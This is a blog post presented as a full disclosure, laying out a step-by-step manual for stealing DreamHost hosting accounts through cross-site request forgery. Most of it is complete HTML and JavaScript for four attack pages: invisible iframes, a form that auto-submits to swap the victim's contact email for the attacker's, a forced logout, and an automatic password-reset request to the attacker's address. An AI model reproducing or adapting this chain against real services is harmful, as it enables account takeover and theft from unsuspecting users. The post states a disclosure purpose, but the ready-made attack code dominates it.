How to Steal DreamHost accounts?
I thought a lot before posting this, but in the name of full disclosures..
This is the second time someone is trying to do that against my dreamhost account so I guess that it need to be public.
It will work on any dreamhost costumer that logged in to his account (Note – you must use the logout button and then it will not work on your account 🙂 ).
A legal notice – If you use this to hack into someone’s account you probably know that it is illegal and I have nothing to do with it. This disclosure is for learning purpose and to make dreamhost fix it asap..
A short manual – how to steal dreamhost accounts (I guess that it can be used to steal any account that use same defective security mechanism).
So – How?
It is done by sending a link to a page you need to create and host online.
There will be 4 web pages to do 3 stages of attack:
1. Automatic change of contact details in the dreamhost control panel from your mark’s details to something you can get access to (the most important is the e-mail address).
2. automatic logoff your mark from dreamhost’s control panel.
3. request a new password to the new e-mail from dreamhost.
The first page (lets call it start.php):
1: <html>
2: <META content="text/html; charset=iso-8859-8-i" http-equiv=Content-Type>
3: <a1>This page can not be found</a1>
4: <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info.php" scrolling="no" frameborder="0"></iframe>
5: <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
6: </iframe>
7: </html>
as you can see, this page is loading two iframes with 0.1% height and width so the mark can’t see it.
info.php:
1: <html>
2: <body>
3: <form method=post action="https://panel.dreamhost.com/id/?" id="2" name="asd">
4: <input type=hidden name=tab value="contact">
5: <input type=hidden name="command" value="submit_edit">
6: <tr valign=top>
7: <td id=txt align=right><b>Name:</b></td>
8: <td><select name="prefix" id=frm>
9: <option value=""></option>
10: </select>
11: <input name="first" value="somename" size="8" id=frm>
12: <input name="middle" size="1" id=frm>
13: <input name="last" value="somefamily" size="8" id=frm>
14: <select name="suffix" id=frm>
15: <option value=""></option>
16: </select>
17: </td>
18: </tr>
19: <tr valign=top>
20:
21: <td id=txt align=right><b>Address:</b></td>
22: <td><input name="street1" value="somestreet" size=30 id=frm><br>
23: <input name="street2" size=30 id=frm><br>
24: <input name="city" value="somecity" size=20 id=frm>, <input name="state" size=2 id=frm> <input name="zip" value="1324" size=8 id=frm><br><select name="country" id=frm><option value="US">United States</option>
25: </select>
26: </td>
27: </tr>
28: <tr valign=top>
29: <td id=txt align=right><b>Email:</b></td>
30: <td><input name="email" value="somemail@somedomain.com" size=30 id=frm></td>
31: </tr>
32: <tr>
33: <td id=txt align=right><b>Phone:</b></td>
34: <td><input name="phone" value="+123.45.6789123" size=30 id=frm></td>
35: </tr>
36: <tr>
37: <td id=txt align=right><b>Fax:</b>*</td>
38: <td><input name="fax" size=30 id=frm></td>
39: </tr>
40: <tr>
41: <td id=txt align=right><b>IM:</b>*</td>
42: <td><input name="chat" size=30 id=frm></td>
43: </tr>
44: <tr>
45: <td id=txt align=right><b>URL:</b>*</td>
46: <td><input name="url" size=30 id=frm></td>
47: </tr>
48: <tr>
49: <td></td>
50: <td id=txt>*optional information</td>
51: </tr>
52: <tr>
53: <td colspan=2 align=center id=txt><input type=submit value="Submit New Contact Info" id=frm><br>or<br></td>
54: </tr>
55: </form>
56: <script>
57: document.asd.submit();
58: </script>
59: <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
60: </body>
61: <html>
as you can see – this page will change the mark’s dreamhost control panel details to whatever you want and then redirect to info3.php
info3.php:
1: <html>
2: <iframe height="0.1%" width="0.1%" src="https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout" scrolling="no" frameborder="0">
3: </iframe>
4: <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info2.html" scrolling="no" frameborder="0"></iframe>
5: </html>
as you can see – info3.php is doing two things:
1. logoff your mark from dreamhost control panel
2. redirect to info2.html
info2.html:
1: <html>
2: <body onload="document.getElementById('2').submit()">
3: <form method="post" class="fancyform" action="https://panel.dreamhost.com/login/forgot.cgi" id="2">
4: <input type="hidden" name="return_url" value="" />
5: <input type="hidden" name="email_pwd_submitted" value="1" />
6: <input name="email" class="text" value="somemail@somedomain.com">
7: <input type="submit" class="button" value="Email me my password!">
8: </form>
9: </body>
10: </html>
this last step is to send a forget password notice to the new email address.
that’s it – 4 pages and you can get any dreamhost account..